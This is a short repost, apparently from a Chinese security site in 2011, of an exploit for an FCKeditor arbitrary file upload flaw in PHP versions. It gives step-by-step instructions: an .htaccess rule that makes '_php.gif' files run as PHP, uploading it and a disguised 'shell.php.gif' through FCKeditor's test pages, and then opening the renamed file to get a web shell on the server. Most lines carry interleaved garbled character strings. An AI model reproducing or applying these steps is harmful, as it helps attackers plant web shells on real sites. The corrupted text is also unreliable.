FCKeditor所有php版本Upload上传漏洞
: I% V' c! A3 M& A作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
* C( p. j0 X8 G" A Y3 H减小字体 增大字体' s k* w: x. P1 D Y' k
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability3 f7 [ }$ E- @
[+] Date: 2011+ {0 ^$ ?4 Y3 _# @& Z* }7 N* |0 v6 f
[+] Author : sinesafe.cn
% q8 e+ p/ I9 W- x! h[+] Website : WwW.sinesafe.cn- q! y5 D7 i0 y* a8 K9 y: i
———————————————————5 U! L7 x' Q: l" O, M/ |. H1 d
1.create a htaccess file:% S; f$ x/ ~* v. n8 ]
code:# }' F6 S$ X. s1 ?7 G" V
<FilesMatch “_php.gif”>9 N* L, ~. h; F% `( v: |
SetHandler application/x-httpd-php- e& @# Z r; @. O2 t
</FilesMatch>5 m0 }9 _2 F5 s2 T" E
1 @- X% ~4 a: n$ U1 \5 d
2.Now upload this htaccess with FCKeditor.& I1 {9 V, R% d. z% n3 ?, u
; r2 ~5 N# t j; s. W" p# uhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html/ Y( h( r# F/ u- l; h
* D1 N1 U+ }, t6 u; V' Ghttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html; I. k0 N+ n7 _* h3 @
* ?5 M) F2 c' d4 D$ p" {% w
———————————————————————————————-1 }' [; G4 U/ M- Q0 [4 u
3.Now upload shell.php.gif with FCKeditor.
2 R0 s7 S5 G7 y, X" G4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.- k1 p3 @6 Y7 P
5.http://www.sinesafe.cn/anything/shell_php.gif* C: ^- o9 f# o6 c' O \
6.Now shell is available from server. |
7 K% C x3 d+ r+ ^( h6 ~2 ^& e. z& {8 M |& i# B, A
. {2 N, y2 j, g2 |6 o3 d |